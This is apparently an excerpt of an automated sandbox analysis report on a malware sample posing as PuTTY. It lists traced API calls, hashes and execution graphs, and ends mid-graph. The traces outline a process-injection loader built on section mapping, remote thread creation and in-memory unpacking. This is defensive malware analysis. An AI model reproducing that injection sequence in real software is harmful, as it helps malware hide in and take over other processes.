                                              Function 004018B1 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              • Opcode ID: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                              • Instruction ID: 35dd9e0e0d775fbf54de8accc2db9d3c4b904cb042cfc7da377ce8c3fe766ee0
                                              • Opcode Fuzzy Hash: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                              • Instruction Fuzzy Hash: 5501A2B6208244EBDB015AA4CD52AEE37259B04320F244177FA13BA0F1DA7CC653E76F
                                              Function 0084C83F Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0084C890
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2177166657.0000000000849000.00000040.00000020.00020000.00000000.sdmp, Offset: 00849000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_849000_putty.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction ID: c922622bb145152d5802465c9ad5a526f46d4f96be88e7316b82f73f246e2fd7
                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction Fuzzy Hash: 32113979A00208EFDB01DF98C985E98BBF5EF08351F0580A4F9489B362D371EA90DF91
                                              Function 004018D0 Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              • Opcode ID: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                              • Instruction ID: 66a051fc3b1640109372302853407978bf892c336f6e5febd052736601f380b8
                                              • Opcode Fuzzy Hash: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                              • Instruction Fuzzy Hash: DBF04FB6208244EBDB006AD1CC51EAE33699B49364F304173B613790F5D67C8653E72F

                                              Non-executed Functions

                                              Function 0094092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2177275719.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_940000_putty.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .$GetProcAddress.$l
                                              • API String ID: 0-2784972518
                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction ID: 1881473ebb8cc92b2ed4aa44de7bd22430dcd9ab104b5d0f7d18c9599c015af2
                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction Fuzzy Hash: C4316BB6910609DFDB10CF99C880AAEBBF9FF88324F24404AD941A7351D775EA45CFA4
                                              Function 0084C45D Relevance: .1, Instructions: 61COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2177166657.0000000000849000.00000040.00000020.00020000.00000000.sdmp, Offset: 00849000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_849000_putty.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction ID: 650ac18f518779146fdec049a8659dcb9e0cb424cdc7a4eb1686d30cc76a6422
                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction Fuzzy Hash: 9111AC72341104AFD780DE59DC91EB273EAFB89320B2980A5E908CB312E676EC02C760
                                              Function 004013CA Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0451e9d16359af643799e3b23a0685e127db626760f30cb9f61b7ea239eb6fd6
                                              • Instruction ID: b4d99e39562e0a8d34f4e8a2adcb899dff0217260de8cdfa4497104cdd6e8b78
                                              • Opcode Fuzzy Hash: 0451e9d16359af643799e3b23a0685e127db626760f30cb9f61b7ea239eb6fd6
                                              • Instruction Fuzzy Hash: 7A117A22B1C21196E3179A918A460A97710DB11360B74C87BD493BB8F3C27D98066BCB
                                              Function 004013D9 Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7431593d3acf0a61d97152af6e57b32ce30d2b428f4d380d733201fdbbf0ad36
                                              • Instruction ID: 9c1a6264578523f2b95dbae5c8345fb03cc7a3f7f5b051fb9d7a91e089220ce3
                                              • Opcode Fuzzy Hash: 7431593d3acf0a61d97152af6e57b32ce30d2b428f4d380d733201fdbbf0ad36
                                              • Instruction Fuzzy Hash: 06118C27A1C20096E3179A90C6461A5B760DB12360B74887BD493778F3D17D58065BCF
                                              Function 004013E0 Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4ead3596dcdc828a5c4cfb9b817dc4ff7884f70c04ac3703ba61ef413fca77a8
                                              • Instruction ID: 7cced9f7fdb1c3f7b009c6269bf5343d8ea2104f00e9896e504acad3335f8aa1
                                              • Opcode Fuzzy Hash: 4ead3596dcdc828a5c4cfb9b817dc4ff7884f70c04ac3703ba61ef413fca77a8
                                              • Instruction Fuzzy Hash: 1811AB23F1C20056E3179F91C6460A8B760DB12360B748C7FD4826B8F7D27D98129BCB
                                              Function 004013F0 Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 862da947cf69c9b5c573b7de815aaadc364d2e787700889f4836839734fe5098
                                              • Instruction ID: 5938fd262c6d7fd7e9059b2c6d5fc66a7b7b37341f859f3ef56555a79cfd23f8
                                              • Opcode Fuzzy Hash: 862da947cf69c9b5c573b7de815aaadc364d2e787700889f4836839734fe5098
                                              • Instruction Fuzzy Hash: 0401AB33F1C20056E3179AA0C6860A9B760DB12360B74887BD482678F3D23D98025BCF
                                              Function 004013F4 Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0e11a3ef683fd68855c3224d2ea3fecd6130d6e756cf9f75479bdcd47c53b27
                                              • Instruction ID: 34643119912da5106e2d45a94dd8d32290489c90b68d507143b233416c26121d
                                              • Opcode Fuzzy Hash: c0e11a3ef683fd68855c3224d2ea3fecd6130d6e756cf9f75479bdcd47c53b27
                                              • Instruction Fuzzy Hash: A101BD23F2821055D71B9BA0C6860E8BB20DA12360B7489BBD052778F3D23C94028BCD
                                              Function 00401412 Relevance: .0, Instructions: 43nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSection
                                              • String ID:
                                              • API String ID: 3132048701-0
                                              • Opcode ID: 26b7c8141964b859a8c9d37ffff58683f7c78d268340d9480a59f47ab8784a65
                                              • Instruction ID: 94d0d6187efa1b4f5fb96639de9bee4adb18fcc7c1e699108f742e7c63bf3b1b
                                              • Opcode Fuzzy Hash: 26b7c8141964b859a8c9d37ffff58683f7c78d268340d9480a59f47ab8784a65
                                              • Instruction Fuzzy Hash: FF019953F2D64126D72B9FA086460D9BB20E9133B07748DBFD4A267CF7C274941487C9
                                              Function 00940D90 Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2177275719.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_940000_putty.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction ID: 8068ea80f1d368fdc3dd01e3f72fddacea9dc050a46abd4e245b775ed3158265
                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction Fuzzy Hash: 5F018F76A006148FDB21CF64C804FAA33B9EBC6316F4544A5DA0A9B281E774A9458F90
                                              Function 0041E640 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              • EndUpdateResourceA.KERNEL32(00000000,00000000,0042204C), ref: 0041E669
                                              • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 0041E6C0
                                              • GetComputerNameA.KERNEL32(?,?), ref: 0041E6D0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176696663.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_411000_putty.jbxd
                                              Similarity
                                              • API ID: ComputerHighestNameNodeNumaNumberResourceUpdate
                                              • String ID: <
                                              • API String ID: 2454257732-4251816714
                                              • Opcode ID: 38b6396692d561f846e82d484e43ff9839e86d75bee0adaba9c0cd9ffd17fbac
                                              • Instruction ID: 1831bf02aaf20b182b31ea32c56b48fe0af4060d55c8b6986e8c7cbcbf37122f
                                              • Opcode Fuzzy Hash: 38b6396692d561f846e82d484e43ff9839e86d75bee0adaba9c0cd9ffd17fbac
                                              • Instruction Fuzzy Hash: 9A118FB51043419FD320DF25D984BABB7E4FF98314FC18D2DF6944A281C778958ACB9A
                                              Function 0041F660 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176696663.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_411000_putty.jbxd
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                              • Instruction ID: ae9c123fa49f40dbb681c5afc6ce5ec73cb2cd7577c926c04dcfacae745abae9
                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                              • Instruction Fuzzy Hash: D411407210014ABBCF125E85DC42CEE3F62BB18354B598526FE1859131D33ACAB7AB89
                                              Function 0041E710 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041E600: GetStartupInfoA.KERNEL32(00000000), ref: 0041E617
                                                • Part of subcall function 0041E600: GetModuleHandleA.KERNEL32(00000000), ref: 0041E61F
                                              • GetEnvironmentStringsW.KERNEL32(00000000), ref: 0041E749
                                              • FindFirstVolumeW.KERNEL32(00000000,00000000), ref: 0041E753
                                              • GetShortPathNameW.KERNEL32(0042333C,?,00000000), ref: 0041E765
                                              • DeleteVolumeMountPointA.KERNEL32(00000000), ref: 0041E784
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176696663.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_411000_putty.jbxd
                                              Similarity
                                              • API ID: Volume$DeleteEnvironmentFindFirstHandleInfoModuleMountNamePathPointShortStartupStrings
                                              • String ID:
                                              • API String ID: 3566876605-0
                                              • Opcode ID: 398f690dd63b4dc214b9c005ea9467d16438635c8015b47d51cfcc86b307485e
                                              • Instruction ID: 7d5483026b8d33337ac4a9549a5db5e9d718fad291004e212951830aed23f32c
                                              • Opcode Fuzzy Hash: 398f690dd63b4dc214b9c005ea9467d16438635c8015b47d51cfcc86b307485e
                                              • Instruction Fuzzy Hash: 9B0186B6A50100EBD664EB65ED4ABA633A4B71C705FC08425F746862A0DFB85444CFAF
                                              Function 0041E678 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 0041E6C0
                                              • GetComputerNameA.KERNEL32(?,?), ref: 0041E6D0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176696663.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_411000_putty.jbxd
                                              Similarity
                                              • API ID: ComputerHighestNameNodeNumaNumber
                                              • String ID: <
                                              • API String ID: 3700106692-4251816714
                                              • Opcode ID: 8250a3e23bbfec59b690a0df1105bb907fd8dd0d175828653fc7dd8941d46e01
                                              • Instruction ID: 78699f444b43a7322d8c77efa18837f699f308161780eb29aa2cbd1f541736c2
                                              • Opcode Fuzzy Hash: 8250a3e23bbfec59b690a0df1105bb907fd8dd0d175828653fc7dd8941d46e01
                                              • Instruction Fuzzy Hash: 220171751083829FC720DF25D84465FB7E4FF84329F858D1DE5A44A240C778954ACB4B

                                              Execution Graph

                                              Execution Coverage:7.9%
                                              Dynamic/Decrypted Code Coverage:25.5%
                                              Signature Coverage:0%
                                              Total number of Nodes:192
                                              Total number of Limit Nodes:6
                                              execution_graph 5254 41ec00 5255 41ec0a __cfltcvt_init 5254->5255 5258 41f774 GetModuleHandleA 5255->5258 5257 41ec0f __setdefaultprecision 5259 41f783 GetProcAddress 5258->5259 5260 41f736 5258->5260 5259->5260 5260->5257 5273 880001 5274 880005 5273->5274 5279 88092b GetPEB 5274->5279 5276 880030 5281 88003c 5276->5281 5280 880972 5279->5280 5280->5276 5282 880049 5281->5282 5283 880e0f 2 API calls 5282->5283 5284 880223 5283->5284 5285 880d90 GetPEB 5284->5285 5286 880238 VirtualAlloc 5285->5286 5287 880265 5286->5287 5288 8802ce VirtualProtect 5287->5288 5290 88030b 5288->5290 5289 880439 VirtualFree 5293 8804be LoadLibraryA 5289->5293 5290->5289 5292 8808c7 5293->5292 5408 4013ca 5409 4013d0 5408->5409 5410 401478 5409->5410 5411 401564 NtDuplicateObject 5409->5411 5411->5410 5412 401581 NtCreateSection 5411->5412 5413 401601 NtCreateSection 5412->5413 5414 4015a7 NtMapViewOfSection 5412->5414 5413->5410 5416 40162d 5413->5416 5414->5413 5415 4015ca NtMapViewOfSection 5414->5415 5415->5413 5418 4015e8 5415->5418 5416->5410 5417 401637 NtMapViewOfSection 5416->5417 5417->5410 5419 40165e NtMapViewOfSection 5417->5419 5418->5413 5419->5410 5294 880005 5295 88092b GetPEB 5294->5295 5296 880030 5295->5296 5297 88003c 7 API calls 5296->5297 5298 880038 5297->5298 5250 402f8f 5251 4030d2 5250->5251 5252 402fb9 5250->5252 5252->5251 5252->5252 5253 403074 RtlCreateUserThread NtTerminateProcess 5252->5253 5253->5251 5330 40148f 5331 401414 5330->5331 5341 401478 5330->5341 5332 401564 NtDuplicateObject 5331->5332 5331->5341 5333 401581 NtCreateSection 5332->5333 5332->5341 5334 401601 NtCreateSection 5333->5334 5335 4015a7 NtMapViewOfSection 5333->5335 5337 40162d 5334->5337 5334->5341 5335->5334 5336 4015ca NtMapViewOfSection 5335->5336 5336->5334 5339 4015e8 5336->5339 5338 401637 NtMapViewOfSection 5337->5338 5337->5341 5340 40165e NtMapViewOfSection 5338->5340 5338->5341 5339->5334 5340->5341 5128 402e51 5131 402e44 5128->5131 5129 402ef2 5131->5129 5132 401891 5131->5132 5133 4018a1 5132->5133 5134 4018da Sleep 5133->5134 5139 4013bf 5134->5139 5136 4018f5 5137 401906 5136->5137 5151 4014b5 5136->5151 5137->5129 5140 4013d0 5139->5140 5141 401564 NtDuplicateObject 5140->5141 5142 401478 5140->5142 5141->5142 5143 401581 NtCreateSection 5141->5143 5142->5136 5144 401601 NtCreateSection 5143->5144 5145 4015a7 NtMapViewOfSection 5143->5145 5144->5142 5147 40162d 5144->5147 5145->5144 5146 4015ca NtMapViewOfSection 5145->5146 5146->5144 5149 4015e8 5146->5149 5147->5142 5148 401637 NtMapViewOfSection 5147->5148 5148->5142 5150 40165e NtMapViewOfSection 5148->5150 5149->5144 5150->5142 5152 4014c6 5151->5152 5153 401564 NtDuplicateObject 5152->5153 5162 401680 5152->5162 5154 401581 NtCreateSection 5153->5154 5153->5162 5155 401601 NtCreateSection 5154->5155 5156 4015a7 NtMapViewOfSection 5154->5156 5158 40162d 5155->5158 5155->5162 5156->5155 5157 4015ca NtMapViewOfSection 5156->5157 5157->5155 5160 4015e8 5157->5160 5159 401637 NtMapViewOfSection 5158->5159 5158->5162 5161 40165e NtMapViewOfSection 5159->5161 5159->5162 5160->5155 5161->5162 5162->5137 5163 41eb90 5166 41e7a0 5163->5166 5165 41eb95 5167 41e7d3 5166->5167 5168 41e854 GetDateFormatA 5167->5168 5169 41e896 5167->5169 5168->5167 5170 41e983 5169->5170 5171 41e8a5 7 API calls 5169->5171 5172 41e990 InterlockedDecrement GetCommandLineA SetErrorMode GetAtomNameA SearchPathA 5170->5172 5173 41ea4b LocalAlloc 5170->5173 5185 41e931 5171->5185 5176 41e9d9 7 API calls 5172->5176 5174 41ea6d 5173->5174 5187 41e560 LoadLibraryA 5174->5187 5178 41ea42 5176->5178 5179 41ea39 OpenFileMappingW 5176->5179 5177 41eaa6 5188 41e420 GetModuleHandleW GetProcAddress VirtualProtect 5177->5188 5178->5173 5179->5178 5181 41eaab 5189 41e710 5181->5189 5183 41eab0 5184 41eaea InterlockedIncrement 5183->5184 5186 41eafe 5183->5186 5184->5183 5185->5170 5186->5165 5187->5177 5188->5181 5198 41e600 5189->5198 5192 41e749 GetEnvironmentStringsW FindFirstVolumeW GetShortPathNameW 5193 41e76b 5192->5193 5201 41e640 5193->5201 5196 41e782 DeleteVolumeMountPointA 5197 41e78a 5196->5197 5197->5183 5199 41e625 5198->5199 5200 41e615 GetStartupInfoA GetModuleHandleA 5198->5200 5199->5192 5199->5193 5200->5199 5202 41e665 EndUpdateResourceA 5201->5202 5205 41e66f 5201->5205 5202->5205 5203 41e6db 5203->5196 5203->5197 5205->5203 5206 41e6bb GetNumaHighestNodeNumber GetComputerNameA 5205->5206 5207 41e630 5205->5207 5206->5205 5210 41e5c0 5207->5210 5211 41e5e9 5210->5211 5212 41e5dc ResetEvent 5210->5212 5211->5205 5212->5211 5306 4014d3 5307 4014d8 5306->5307 5308 401564 NtDuplicateObject 5307->5308 5317 401680 5307->5317 5309 401581 NtCreateSection 5308->5309 5308->5317 5310 401601 NtCreateSection 5309->5310 5311 4015a7 NtMapViewOfSection 5309->5311 5313 40162d 5310->5313 5310->5317 5311->5310 5312 4015ca NtMapViewOfSection 5311->5312 5312->5310 5315 4015e8 5312->5315 5314 401637 NtMapViewOfSection 5313->5314 5313->5317 5316 40165e NtMapViewOfSection 5314->5316 5314->5317 5315->5310 5316->5317 5342 40189c 5343 4018ae 5342->5343 5344 4018da Sleep 5343->5344 5345 4013bf 7 API calls 5344->5345 5346 4018f5 5345->5346 5347 401906 5346->5347 5348 4014b5 7 API calls 5346->5348 5348->5347 5375 402d2c 5377 402d35 5375->5377 5376 401891 15 API calls 5378 402ef2 5376->5378 5377->5376 5377->5378 5213 aaae98 5216 aaaea8 5213->5216 5217 aaaeb7 5216->5217 5220 aab648 5217->5220 5222 aab663 5220->5222 5221 aab66c CreateToolhelp32Snapshot 5221->5222 5223 aab688 Module32First 5221->5223 5222->5221 5222->5223 5224 aab697 5223->5224 5226 aaaea7 5223->5226 5227 aab307 5224->5227 5228 aab332 5227->5228 5229 aab37b 5228->5229 5230 aab343 VirtualAlloc 5228->5230 5229->5229 5230->5229 5231 88003c 5232 880049 5231->5232 5244 880e0f SetErrorMode SetErrorMode 5232->5244 5237 880265 5238 8802ce VirtualProtect 5237->5238 5240 88030b 5238->5240 5239 880439 VirtualFree 5243 8804be LoadLibraryA 5239->5243 5240->5239 5242 8808c7 5243->5242 5245 880223 5244->5245 5246 880d90 5245->5246 5247 880dad 5246->5247 5248 880dbb GetPEB 5247->5248 5249 880238 VirtualAlloc 5247->5249 5248->5249 5249->5237 5379 41ea75 5380 41ea80 5379->5380 5389 41e560 LoadLibraryA 5380->5389 5382 41eaa6 5390 41e420 GetModuleHandleW GetProcAddress VirtualProtect 5382->5390 5384 41eaab 5385 41e710 10 API calls 5384->5385 5386 41eab0 5385->5386 5387 41eaea InterlockedIncrement 5386->5387 5388 41eafe 5386->5388 5387->5386 5389->5382 5390->5384 5391 41e678 5392 41e680 5391->5392 5393 41e630 ResetEvent 5392->5393 5394 41e6bb GetNumaHighestNodeNumber GetComputerNameA 5392->5394 5395 41e6db 5392->5395 5393->5392 5394->5392

                                              Executed Functions

                                              Function 0041E7A0 Relevance: 34.8, APIs: 23, Instructions: 305timeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 41e7a0-41e7d0 1 41e7d3-41e7d8 0->1 2 41e7e0-41e7e6 1->2 3 41e7da 1->3 4 41e7f4-41e7fa 2->4 5 41e7e8-41e7ee 2->5 3->2 4->1 6 41e7fc-41e80a 4->6 5->4 7 41e810-41e816 6->7 8 41e822-41e828 7->8 9 41e818-41e81d 7->9 10 41e834-41e83b 8->10 11 41e82a-41e82e 8->11 9->8 10->7 12 41e83d-41e84b 10->12 11->10 14 41e850-41e88b GetDateFormatA 12->14 17 41e896-41e89f 14->17 18 41e88d-41e894 14->18 19 41e983-41e98a 17->19 20 41e8a5-41e980 FoldStringA BuildCommDCBA GetTimeFormatA SetProcessPriorityBoost SetFileAttributesA UnregisterWaitEx SetLocaleInfoA 17->20 18->14 18->17 21 41e990-41ea37 InterlockedDecrement GetCommandLineA SetErrorMode GetAtomNameA SearchPathA SetDefaultCommConfigA GetConsoleAliasW GetVersionExA DisconnectNamedPipe GetEnvironmentStringsW WriteConsoleOutputW GetModuleHandleA 19->21 22 41ea4b-41ea6b LocalAlloc 19->22 20->19 30 41ea42-41ea48 21->30 31 41ea39-41ea3c OpenFileMappingW 21->31 23 41eaa1-41eaa6 call 41e560 call 41e420 22->23 24 41ea6d-41ea73 22->24 37 41eaab-41eabe call 41e710 23->37 28 41ea80-41ea90 24->28 32 41ea92 28->32 33 41ea9c-41ea9f 28->33 30->22 31->30 32->33 33->23 33->28 42 41eac0-41eac7 37->42 44 41ead4-41eada 42->44 45 41eac9-41ead0 42->45 46 41eae1-41eae8 44->46 47 41eadc call 41e410 44->47 45->44 51 41eaf5-41eafc 46->51 52 41eaea-41eaef InterlockedIncrement 46->52 47->46 51->42 53 41eafe-41eb0e 51->53 52->51 54 41eb10-41eb20 53->54 56 41eb22-41eb3c 54->56 57 41eb3f-41eb42 54->57 56->57 57->54 58 41eb44-41eb50 57->58 60 41eb52-41eb66 58->60 66 41eb72-41eb79 60->66 67 41eb68-41eb70 60->67 66->60 68 41eb7b-41eb8f 66->68 67->66 67->68
                                              APIs
                                              • GetDateFormatA.KERNELBASE(00000000,00000000,?,00000000,?,00000000), ref: 0041E87F
                                              • FoldStringA.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0041E8BA
                                              • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 0041E8C2
                                              • GetTimeFormatA.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 0041E8F3
                                              • SetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 0041E8FB
                                              • SetFileAttributesA.KERNEL32(00423370,00000000), ref: 0041E907
                                              • UnregisterWaitEx.KERNEL32(?,00000000), ref: 0041E917
                                              • SetLocaleInfoA.KERNEL32(00000000,00000000,00423380), ref: 0041E924
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439046439.0000000000411000.00000020.00000001.01000000.00000006.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_411000_hajefwb.jbxd
                                              Similarity
                                              • API ID: Format$AttributesBoostBuildCommDateFileFoldInfoLocalePriorityProcessStringTimeUnregisterWait
                                              • String ID:
                                              • API String ID: 3960956766-0
                                              • Opcode ID: 914c2a7e43a7881f3aa375db9e339a1e29a6939f754bf8832aeec207d45dfe88
                                              • Instruction ID: 6ae51a12dd7b4aebb8f82212809d29e946f68f2589e94ec055893a89d6f8ae5b
                                              • Opcode Fuzzy Hash: 914c2a7e43a7881f3aa375db9e339a1e29a6939f754bf8832aeec207d45dfe88
                                              • Instruction Fuzzy Hash: 20A1C0B5904200AFD320EF61ED84DAB77ADFB88304F40493EFA4692261DB789C45CB6D
                                              Function 004013BF Relevance: 10.8, APIs: 7, Instructions: 299COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 155 4013bf-4013c8 156 4013d0-4013d6 155->156 157 4013da 155->157 158 4013dd-401422 call 40113b 156->158 157->156 157->158 168 401424-401440 158->168 169 401496-40149e 158->169 171 401442 168->171 172 4014b7-4014d5 168->172 170 4014a0-4014b2 169->170 174 401492-401494 171->174 175 401444-401446 171->175 176 4014c6-4014e9 172->176 175->170 177 401448-401461 175->177 185 4014e0 176->185 181 401463-401468 177->181 182 4014c4 177->182 183 4014e5-4014f8 181->183 184 40146a 181->184 182->176 192 4014f1-4014f4 183->192 193 4014fb-40150e call 40113b 183->193 186 40146c-401476 184->186 187 4014de 184->187 185->183 189 401414-401422 186->189 190 401478-40147c 186->190 187->185 189->168 189->169 192->193 196 401510 193->196 197 401513-401518 193->197 196->197 199 40183d-401845 197->199 200 40151e-40152f 197->200 199->197 203 40184a 199->203 204 401535-40155e 200->204 205 40183b 200->205 206 401861 203->206 207 401852-40185d 203->207 204->205 213 401564-40157b NtDuplicateObject 204->213 205->203 206->207 209 401864-40188e call 40113b 206->209 207->209 213->205 216 401581-4015a5 NtCreateSection 213->216 218 401601-401627 NtCreateSection 216->218 219 4015a7-4015c8 NtMapViewOfSection 216->219 218->205 222 40162d-401631 218->222 219->218 221 4015ca-4015e6 